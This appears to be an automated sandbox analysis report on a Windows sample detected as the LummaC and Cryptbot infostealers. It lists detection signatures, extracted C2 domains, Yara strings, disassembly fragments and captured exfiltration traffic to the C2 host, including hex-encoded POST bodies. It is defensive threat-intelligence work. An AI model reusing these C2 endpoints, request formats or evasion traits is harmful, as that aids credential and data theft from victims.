Windows Analysis Report
jo0PnKm2Lg.exe

Overview

General Information

Sample name: jo0PnKm2Lg.exe (renamed because original name is a hash value)
Original sample name: 8398fc4aa3a5a5ab6ae7ed394b449d0a.exe
Analysis ID: 1589511
MD5: 8398fc4aa3a5a5ab6ae7ed394b449d0a
SHA1: 820ce4bb8eb51e31effa41e6829e84089b728760
SHA256: f25fab3f64bad2cd989035dd854b761fe06b97e76291bd180991d21d91ea5c22
Tags: exe, user-abuse_ch

Detection

LummaC, Cryptbot, LummaC Stealer
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Cryptbot
Yara detected LummaC Stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Leaks process information
LummaC encrypted strings found
Machine Learning detection for dropped file
Machine Learning detection for sample
Sample uses string decryption to hide its real strings
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • jo0PnKm2Lg.exe (PID: 3580 cmdline: "C:\Users\user\Desktop\jo0PnKm2Lg.exe" MD5: 8398FC4AA3A5A5AB6AE7ED394B449D0A)
    • LummaC2.exe (PID: 5328 cmdline: "C:\Users\user\AppData\Local\Temp\LummaC2.exe" MD5: 8DA89B163D506BE4A73B987517A1B9E4)
    • Set-up.exe (PID: 3128 cmdline: "C:\Users\user\AppData\Local\Temp\Set-up.exe" MD5: 53D48938C0EC850EB316CF433ECFC045)
  • cleanup
Name: Lumma Stealer, LummaC2 Stealer
Description: Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5". The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.
Attribution: No Attribution
Blogpost URLs / Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Name: CryptBot
Description: A typical infostealer, capable of obtaining credentials for browsers, cryptocurrency wallets, browser cookies and credit cards, and of creating screenshots of the infected system. All stolen data is bundled into a zip file that is uploaded to the C2.
Attribution: No Attribution
Blogpost URLs / Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.cryptbot

Extracted LummaC configuration:
{"C2 url": ["nearycrepso.shop", "wholersorie.shop", "framekgirus.shop", "tirepublicerj.shop", "noisycuttej.shop", "cloudewahsj.shop", "rabidcowse.shop", "berserkyfir.click", "abruptyopsn.shop"], "Build id": "MeHdy4--pl14vs02"}

Extracted Cryptbot configuration:
{"C2 list": ["home.twelve12vs.top", "twelve12vs.top", "a.dnspod.comvs.top", "gPhome.twelve12vs.top", "twelve12vse12vs.top", "twelve12vs.top.top"]}
Source: jo0PnKm2Lg.exe
Rule: MALWARE_Win_DLInjector04
Description: Detects downloader / injector
Author: ditekSHen
Strings:
  • 0x7df0d1:$s1: Runner
  • 0x7df236:$s3: RunOnStartup
  • 0x7df0e5:$a1: Antis
  • 0x7df112:$a2: antiVM
  • 0x7df119:$a3: antiSandbox
  • 0x7df125:$a4: antiDebug
  • 0x7df12f:$a5: antiEmulator
  • 0x7df13c:$a6: enablePersistence
  • 0x7df14e:$a7: enableFakeError
  • 0x7df25f:$a8: DetectVirtualMachine
  • 0x7df284:$a9: DetectSandboxie
  • 0x7df2af:$a10: DetectDebugger
  • 0x7df2be:$a11: CheckEmulator

Source: Process Memory Space: Set-up.exe PID: 3128
Rule: JoeSecurity_Cryptbot_1
Description: Yara detected Cryptbot
Author: Joe Security

Source: decrypted.memstr
Rule: JoeSecurity_LummaCStealer_2
Description: Yara detected LummaC Stealer
Author: Joe Security

Source: 0.0.jo0PnKm2Lg.exe.950000.0.unpack
Rule: MALWARE_Win_DLInjector04
Description: Detects downloader / injector
Author: ditekSHen
Strings:
  • 0x7df0d1:$s1: Runner
  • 0x7df236:$s3: RunOnStartup
  • 0x7df0e5:$a1: Antis
  • 0x7df112:$a2: antiVM
  • 0x7df119:$a3: antiSandbox
  • 0x7df125:$a4: antiDebug
  • 0x7df12f:$a5: antiEmulator
  • 0x7df13c:$a6: enablePersistence
  • 0x7df14e:$a7: enableFakeError
  • 0x7df25f:$a8: DetectVirtualMachine
  • 0x7df284:$a9: DetectSandboxie
  • 0x7df2af:$a10: DetectDebugger
  • 0x7df2be:$a11: CheckEmulator

No Sigma rule has matched

Suricata IDS alert:
Timestamp: 2025-01-12T17:45:21.989992+0100
SID: 2059018
Severity: 1
Classtype: A Network Trojan was detected
Source IP: 192.168.2.5
Source Port: 49723
Destination IP: 176.53.147.104
Destination Port: 80
Protocol: TCP

      AV Detection

Source: jo0PnKm2Lg.exe | Avira: detected
Source: gPhome.twelve12vs.top | Avira URL Cloud: Label: malware
Source: berserkyfir.click | Avira URL Cloud: Label: malware
Source: twelve12vs.top | Avira URL Cloud: Label: malware
Source: home.twelve12vs.top | Avira URL Cloud: Label: malware
Source: 00000002.00000002.3421885892.000000000131A000.00000004.00000020.00020000.00000000.sdmp | Malware Configuration Extractor: LummaC {"C2 url": ["nearycrepso.shop", "wholersorie.shop", "framekgirus.shop", "tirepublicerj.shop", "noisycuttej.shop", "cloudewahsj.shop", "rabidcowse.shop", "berserkyfir.click", "abruptyopsn.shop"], "Build id": "MeHdy4--pl14vs02"}
Source: Set-up.exe.3128.3.memstrmin | Malware Configuration Extractor: Cryptbot {"C2 list": ["home.twelve12vs.top", "twelve12vs.top", "a.dnspod.comvs.top", "gPhome.twelve12vs.top", "twelve12vse12vs.top", "twelve12vs.top.top"]}
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe | ReversingLabs: Detection: 68%
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe | ReversingLabs: Detection: 75%
Source: jo0PnKm2Lg.exe | ReversingLabs: Detection: 76%
Source: jo0PnKm2Lg.exe | Virustotal: Detection: 69%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 98.0% probability
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe | Joe Sandbox ML: detected
Source: jo0PnKm2Lg.exe | Joe Sandbox ML: detected
Source: 00000002.00000002.3421885892.000000000131A000.00000004.00000020.00020000.00000000.sdmp | String decryptor: cloudewahsj.shop
Source: 00000002.00000002.3421885892.000000000131A000.00000004.00000020.00020000.00000000.sdmp | String decryptor: rabidcowse.shop
Source: 00000002.00000002.3421885892.000000000131A000.00000004.00000020.00020000.00000000.sdmp | String decryptor: noisycuttej.shop
Source: 00000002.00000002.3421885892.000000000131A000.00000004.00000020.00020000.00000000.sdmp | String decryptor: tirepublicerj.shop
Source: 00000002.00000002.3421885892.000000000131A000.00000004.00000020.00020000.00000000.sdmp | String decryptor: framekgirus.shop
Source: 00000002.00000002.3421885892.000000000131A000.00000004.00000020.00020000.00000000.sdmp | String decryptor: wholersorie.shop
Source: 00000002.00000002.3421885892.000000000131A000.00000004.00000020.00020000.00000000.sdmp | String decryptor: abruptyopsn.shop
Source: 00000002.00000002.3421885892.000000000131A000.00000004.00000020.00020000.00000000.sdmp | String decryptor: nearycrepso.shop
Source: 00000002.00000002.3421885892.000000000131A000.00000004.00000020.00020000.00000000.sdmp | String decryptor: berserkyfir.click
Source: 00000002.00000002.3421885892.000000000131A000.00000004.00000020.00020000.00000000.sdmp | String decryptor: lid=%s&j=%s&ver=4.0
Source: 00000002.00000002.3421885892.000000000131A000.00000004.00000020.00020000.00000000.sdmp | String decryptor: TeslaBrowser/5.5
Source: 00000002.00000002.3421885892.000000000131A000.00000004.00000020.00020000.00000000.sdmp | String decryptor: - Screen Resoluton:
Source: 00000002.00000002.3421885892.000000000131A000.00000004.00000020.00020000.00000000.sdmp | String decryptor: - Physical Installed Memory:
Source: 00000002.00000002.3421885892.000000000131A000.00000004.00000020.00020000.00000000.sdmp | String decryptor: Workgroup: -
Source: 00000002.00000002.3421885892.000000000131A000.00000004.00000020.00020000.00000000.sdmp | String decryptor: MeHdy4--pl14vs02
Source: jo0PnKm2Lg.exe, 00000000.00000002.2190186168.0000000005347000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: -----BEGIN PUBLIC KEY----- | memstr_4ba0d613-2
Source: jo0PnKm2Lg.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: jo0PnKm2Lg.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe | Code function: 4x nop then mov ecx, eax | 2_2_00E32D3B
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe | Code function: 4x nop then movzx edx, byte ptr [esp+eax+09h] | 2_2_00DF8730
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe | Code function: 4x nop then mov ebx, esp | 2_2_00E170D0
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe | Code function: 4x nop then jmp eax | 2_2_00E170D0
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe | Code function: 4x nop then xor byte ptr [esp+eax+01h], al | 2_2_00E198B0
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe | Code function: 4x nop then cmp dword ptr [esi+edx*8], 9B8995CDh | 2_2_00E2D860
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe | Code function: 4x nop then movzx esi, byte ptr [eax] | 2_2_00E34860
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe | Code function: 4x nop then movzx edx, word ptr [eax] | 2_2_00E34860
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe | Code function: 4x nop then mov ebx, dword ptr [edi+04h] | 2_2_00E1D050
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe | Code function: 4x nop then mov ecx, eax | 2_2_00E08025
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe | Code function: 4x nop then mov ecx, edi | 2_2_00DF9000
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe | Code function: 4x nop then test esi, esi | 2_2_00E2E9E0
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe | Code function: 4x nop then cmp dword ptr [edi+esi*8], 01FCE602h | 2_2_00E311E0
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe | Code function: 4x nop then cmp word ptr [esi+ecx+02h], 0000h | 2_2_00E0C9F0
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe | Code function: 4x nop then mov word ptr [ebx], ax | 2_2_00E072C9
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe | Code function: 4x nop then mov ecx, eax | 2_2_00DF92F0
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe | Code function: 4x nop then mov byte ptr [eax], cl | 2_2_00DF92F0
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe | Code function: 4x nop then mov byte ptr [edi], cl | 2_2_00E21AB0
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe | Code function: 4x nop then mov byte ptr [edi], cl | 2_2_00E0C270
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe | Code function: 4x nop then mov ebx, esp | 2_2_00E17250
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe | Code function: 4x nop then jmp eax | 2_2_00E17250
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe | Code function: 4x nop then mov word ptr [eax], cx | 2_2_00E11BF0
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe | Code function: 4x nop then add ebp, dword ptr [esp+0Ch] | 2_2_00E1EBF0
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe | Code function: 4x nop then mov byte ptr [edi], cl | 2_2_00E20BF7
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe | Code function: 4x nop then jmp eax | 2_2_00E33BB7
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe | Code function: 4x nop then movzx eax, byte ptr [esp+esi+000001F0h] | 2_2_00DFEB5F
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe | Code function: 4x nop then mov edx, eax | 2_2_00E18B70
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe | Code function: 4x nop then jmp eax | 2_2_00E33B70
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe | Code function: 4x nop then mov ecx, dword ptr [esi+3Ch] | 2_2_00E08B3B
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe | Code function: 4x nop then mov word ptr [eax], cx | 2_2_00E054C0
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe | Code function: 4x nop then mov word ptr [edx], cx | 2_2_00E054C0
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe | Code function: 4x nop then mov word ptr [edx], di | 2_2_00DFE4F3
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe | Code function: 4x nop then mov edx, esi | 2_2_00E2ECD9
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe | Code function: 4x nop then movzx ecx, byte ptr [esp+eax+23h] | 2_2_00E2ECD9
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe | Code function: 4x nop then movzx edx, byte ptr [esp+ecx-5650DC85h] | 2_2_00E2ECD9
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe | Code function: 4x nop then mov ecx, ebx | 2_2_00E1CCB0
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe | Code function: 4x nop then cmp word ptr [eax+esi+02h], 0000h | 2_2_00E1BC9A
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe | Code function: 4x nop then mov ecx, eax | 2_2_00E1BC9A
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe | Code function: 4x nop then movzx ebx, byte ptr [esp+edx+03h] | 2_2_00E33C60
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe | Code function: 4x nop then inc eax | 2_2_00E33C60
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe | Code function: 4x nop then movzx ebx, byte ptr [edx] | 2_2_00E2A470
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe | Code function: 4x nop then mov byte ptr [eax], cl | 2_2_00E06444
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe | Code function: 4x nop then cmp dword ptr [edi+ecx*8], F68AC6D1h | 2_2_00E06444
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe | Code function: 4x nop then movzx edx, byte ptr [esp+eax+50h] | 2_2_00E19C30
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe | Code function: 4x nop then movzx edi, byte ptr [esp+eax-6282CB83h] | 2_2_00DFADD0
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe | Code function: 4x nop then inc eax | 2_2_00E33DC0
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe | Code function: 4x nop then movzx ecx, byte ptr [esp+eax+18h] | 2_2_00E0B5A0
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe | Code function: 4x nop then movzx edx, byte ptr [esp+eax+20h] | 2_2_00E20DB3
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe | Code function: 4x nop then mov byte ptr [edi], cl | 2_2_00E205B5
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe | Code function: 4x nop then mov edx, ecx | 2_2_00E0A580
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe | Code function: 4x nop then cmp word ptr [eax+esi+02h], 0000h | 2_2_00E1BD9A
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe | Code function: 4x nop then mov ecx, eax | 2_2_00E1BD9A
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe | Code function: 4x nop then movzx edx, byte ptr [esp+ecx-5650DC85h] | 2_2_00E2F57A
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe | Code function: 4x nop then add eax, dword ptr [esp+ecx*4+24h] | 2_2_00DF7540
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe | Code function: 4x nop then movzx ecx, word ptr [edi+esi*4] | 2_2_00DF7540
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe | Code function: 4x nop then movzx ecx, byte ptr [esp+eax-294BBCC4h] | 2_2_00E31D40
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe | Code function: 4x nop then movsx eax, byte ptr [esi+ecx] | 2_2_00E0FD50
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe | Code function: 4x nop then movzx esi, byte ptr [esp+ecx+04h] | 2_2_00E13500
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe | Code function: 4x nop then mov word ptr [eax], cx | 2_2_00E13500
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe | Code function: 4x nop then inc eax | 2_2_00E33EA0
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe | Code function: 4x nop then push 869608D1h | 2_2_00E09EA4
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe | Code function: 4x nop then movzx eax, byte ptr [esp+ebx+38h] | 2_2_00DFBE59
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe | Code function: 4x nop then movzx edx, byte ptr [esp+eax-72F9EF2Bh] | 2_2_00DFCE48
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe | Code function: 4x nop then mov ebx, esp | 2_2_00E16E20
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe | Code function: 4x nop then jmp eax | 2_2_00E16E20
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe | Code function: 4x nop then cmp word ptr [edi+ebx+02h], 0000h | 2_2_00E34780
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe | Code function: 4x nop then cmp dword ptr [ebp+ebx*8+00h], 27BE92A4h | 2_2_00E34780
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe | Code function: 4x nop then mov ecx, ebp | 2_2_00DF97B0
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe | Code function: 4x nop then cmp word ptr [eax+esi+02h], 0000h | 2_2_00E1B770
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe | Code function: 4x nop then mov ecx, eax | 2_2_00E1B770
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe | Code function: 4x nop then inc eax | 2_2_00E33F40
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe | Code function: 4x nop then cmp dword ptr [ebx+edx*8], 53585096h | 2_2_00E18F30
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe | Code function: 4x nop then mov word ptr [ebx], ax | 2_2_00E07703
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe | Code function: 4x nop then mov byte ptr [edi], al | 2_2_00E1FF19

      Networking

Source: Network traffic | Suricata IDS: 2059018 - Severity 1 - ET MALWARE CryptBot CnC Checkin : 192.168.2.5:49723 -> 176.53.147.104:80
Source: Malware configuration extractor | URLs: nearycrepso.shop
Source: Malware configuration extractor | URLs: wholersorie.shop
Source: Malware configuration extractor | URLs: framekgirus.shop
Source: Malware configuration extractor | URLs: tirepublicerj.shop
Source: Malware configuration extractor | URLs: noisycuttej.shop
Source: Malware configuration extractor | URLs: cloudewahsj.shop
Source: Malware configuration extractor | URLs: rabidcowse.shop
Source: Malware configuration extractor | URLs: berserkyfir.click
Source: Malware configuration extractor | URLs: abruptyopsn.shop
Source: Malware configuration extractor | URLs: home.twelve12vs.top
Source: Malware configuration extractor | URLs: twelve12vs.top
Source: Malware configuration extractor | URLs: a.dnspod.comvs.top
Source: Malware configuration extractor | URLs: gPhome.twelve12vs.top
Source: Malware configuration extractor | URLs: twelve12vse12vs.top
Source: Malware configuration extractor | URLs: twelve12vs.top.top
Source: global traffic | HTTP traffic detected: GET /ip HTTP/1.1 | Host: httpbin.org | Accept: */*
      Source: global trafficHTTP traffic detected: POST /AvWHJxAVCxPehbRictmJ1736163220 HTTP/1.1Host: home.twelve12vs.topAccept: */*Content-Type: application/jsonContent-Length: 529138Data Raw: 7b 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 20 22 63 75 72 72 65 6e 74 5f 74 69 6d 65 22 3a 20 22 38 34 32 38 34 38 38 32 34 31 39 35 38 38 37 35 35 35 31 22 2c 20 22 4e 75 6d 5f 70 72 6f 63 65 73 73 6f 72 22 3a 20 34 2c 20 22 4e 75 6d 5f 72 61 6d 22 3a 20 37 2c 20 22 64 72 69 76 65 72 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 43 3a 5c 5c 22 2c 20 22 61 6c 6c 22 3a 20 32 32 33 2e 30 2c 20 22 66 72 65 65 22 3a 20 31 36 38 2e 30 20 7d 20 5d 2c 20 22 4e 75 6d 5f 64 69 73 70 6c 61 79 73 22 3a 20 31 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 78 22 3a 20 31 32 38 30 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 79 22 3a 20 31 30 32 34 2c 20 22 72 65 63 65 6e 74 5f 66 69 6c 65 73 22 3a 20 33 38 2c 20 22 70 72 6f 63 65 73 73 65 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 5b 53 79 73 74 65 6d 20 50 72 6f 63 65 73 73 5d 22 2c 20 22 70 69 64 22 3a 20 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 53 79 73 74 65 6d 22 2c 20 22 70 69 64 22 3a 20 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 52 65 67 69 73 74 72 79 22 2c 20 22 70 69 64 22 3a 20 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 6d 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 33 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 32 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 69 6e 69 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 39 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 35 30 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 6c 6f 67 6f 6e 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 35 36 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 65 72 76 69 63 65 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 33 32 20 7d 2c 20 7b 20 22 6e 61 
6d 65 22 3a 20 22 6c 73 61 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 34 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 35 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 38 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 38 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 38 37 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 32 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 64 77 6d 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 34 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 33 32 20 7d 2c
Source: global traffic | HTTP traffic detected: GET /AvWHJxAVCxPehbRictmJ1736163220?argument=0 HTTP/1.1 | Host: home.twelve12vs.top | Accept: */*
Source: global traffic | HTTP traffic detected: POST /AvWHJxAVCxPehbRictmJ1736163220 HTTP/1.1 | Host: home.twelve12vs.top | Accept: */* | Content-Type: application/json | Content-Length: 31 | Data Raw: 7b 20 22 69 64 31 22 3a 20 22 30 22 2c 20 22 64 61 74 61 22 3a 20 22 44 6f 6e 65 31 22 20 7d | Data Ascii: { "id1": "0", "data": "Done1" }
Source: Joe Sandbox View | ASN Name: VANNINVENTURESGB VANNINVENTURESGB
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic | HTTP traffic detected: GET /ip HTTP/1.1 | Host: httpbin.org | Accept: */*
Source: global traffic | HTTP traffic detected: GET /AvWHJxAVCxPehbRictmJ1736163220?argument=0 HTTP/1.1 | Host: home.twelve12vs.top | Accept: */*
Source: global traffic | DNS traffic detected: DNS query: httpbin.org
Source: global traffic | DNS traffic detected: DNS query: home.twelve12vs.top
      Source: unknownHTTP traffic detected: POST /AvWHJxAVCxPehbRictmJ1736163220 HTTP/1.1Host: home.twelve12vs.topAccept: */*Content-Type: application/jsonContent-Length: 529138Data Raw: 7b 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 20 22 63 75 72 72 65 6e 74 5f 74 69 6d 65 22 3a 20 22 38 34 32 38 34 38 38 32 34 31 39 35 38 38 37 35 35 35 31 22 2c 20 22 4e 75 6d 5f 70 72 6f 63 65 73 73 6f 72 22 3a 20 34 2c 20 22 4e 75 6d 5f 72 61 6d 22 3a 20 37 2c 20 22 64 72 69 76 65 72 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 43 3a 5c 5c 22 2c 20 22 61 6c 6c 22 3a 20 32 32 33 2e 30 2c 20 22 66 72 65 65 22 3a 20 31 36 38 2e 30 20 7d 20 5d 2c 20 22 4e 75 6d 5f 64 69 73 70 6c 61 79 73 22 3a 20 31 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 78 22 3a 20 31 32 38 30 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 79 22 3a 20 31 30 32 34 2c 20 22 72 65 63 65 6e 74 5f 66 69 6c 65 73 22 3a 20 33 38 2c 20 22 70 72 6f 63 65 73 73 65 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 5b 53 79 73 74 65 6d 20 50 72 6f 63 65 73 73 5d 22 2c 20 22 70 69 64 22 3a 20 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 53 79 73 74 65 6d 22 2c 20 22 70 69 64 22 3a 20 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 52 65 67 69 73 74 72 79 22 2c 20 22 70 69 64 22 3a 20 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 6d 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 33 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 32 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 69 6e 69 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 39 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 35 30 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 6c 6f 67 6f 6e 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 35 36 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 65 72 76 69 63 65 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 33 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 
